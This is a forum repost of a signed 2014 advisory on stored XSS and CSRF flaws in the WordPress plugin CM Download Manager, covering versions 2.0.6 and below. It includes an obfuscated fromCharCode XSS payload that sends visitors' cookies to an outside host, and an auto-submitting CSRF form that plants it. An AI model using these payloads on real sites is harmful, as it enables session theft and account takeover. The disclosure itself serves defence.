Aerosol Posted December 4, 2014 Report Posted December 4, 2014 -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1Product: WordPress plugin cm-download-managerPlugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url]Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url]Vulnerability Type: CWE-79: Cross-site scriptingVulnerable Versions: 2.0.6 and belowFixed Version: 2.0.7Solution Status: Fixed by VendorVendor Notification: 2014-11-27Public Disclosure: 2014-12-02CVE Reference: N/A. Only assigned for CSRFCriticality: LowVulnerability details:CM Download Manager plugin for WordPress contains a flaw that allows a storedcross-site scripting (XSS) attack. This flaw exists because the/wp-admin/admin.php script does not validate input to the 'addons_title' POSTparameter before returning it to users. This allows an authenticated remoteattacker to create a specially crafted request that would execute arbitraryscript code in a user's browser session within the trust relationship betweentheir browser and the server.Root cause:The software incorrectly neutralizes user-controllable input before it is placedin output that is used as a web page that is served to authenticated users.Proof-of-concept:Insert following code to CM Downloads -> Settings -> "Downloads listing title"field with CSRF attack.<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,112, 116, 62);document.write(foo);</script>- ---------------Product: WordPress plugin cm-download-managerPlugin page: [url]https://wordpress.org/plugins/cm-download-manager/[/url]Vendor: CreativeMindsSolutions [url]http://cminds.com/[/url]Vulnerability Type: CWE-352: Cross-Site Request ForgeryVulnerable Versions: 2.0.6 and belowFixed Version: 2.0.7Solution Status: Fixed by VendorVendor Notification: 2014-11-27Public Disclosure: 2014-12-02CVE Reference: CVE-2014-9129Criticality: LowVulnerability details:CM Download Manager plugin for WordPress contains a flaw on theCMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do notrequire multiple steps, explicit confirmation, or a unique token when performingsensitive actions. By tricking authenticated user into following a speciallycrafted link, a context-dependent attacker can perform a CSRF attack causing thevictim to insert and execute arbitrary script code.Root cause:The web application does not sufficiently verify whether a well-formed, valid,consistent request was intentionally provided by the user who submitted therequest.Proof-of-concept:<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3><form id="f1" method="POST"action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings"><table><input type="text" name="addons_title" value="XSS"></table></form><script type="text/javascript">document.getElementById("f1").submit();</script></body></html>Notes:Other pages and/or parameters are also possibly insecure (not tested). Suggestedto do a proper security audit for their software. Vendor did not mentionsecurity fix or CVE in ChangeLog even it was discussed several times. Referencesbelow.Cross-site scripting: [url=http://cwe.mitre.org/data/definitions/79.html]CWE - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (2.8)[/url] [url]https://scapsync.com/cwe/CWE-79[/url] [url]https://en.wikipedia.org/wiki/Cross-site_scripting[/url]Cross-Site Request Forgery: [url=http://cwe.mitre.org/data/definitions/352.html]CWE - CWE-352: Cross-Site Request Forgery (CSRF) (2.8)[/url] [url]https://scapsync.com/cwe/CWE-352[/url] [url]https://en.wikipedia.org/wiki/Cross-site_request_forgery[/url]- ---Henri Salo-----BEGIN PGP SIGNATURE-----Version: GnuPG v1.4.12 (GNU/Linux)iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT=bUVi-----END PGP SIGNATURE-----Source Quote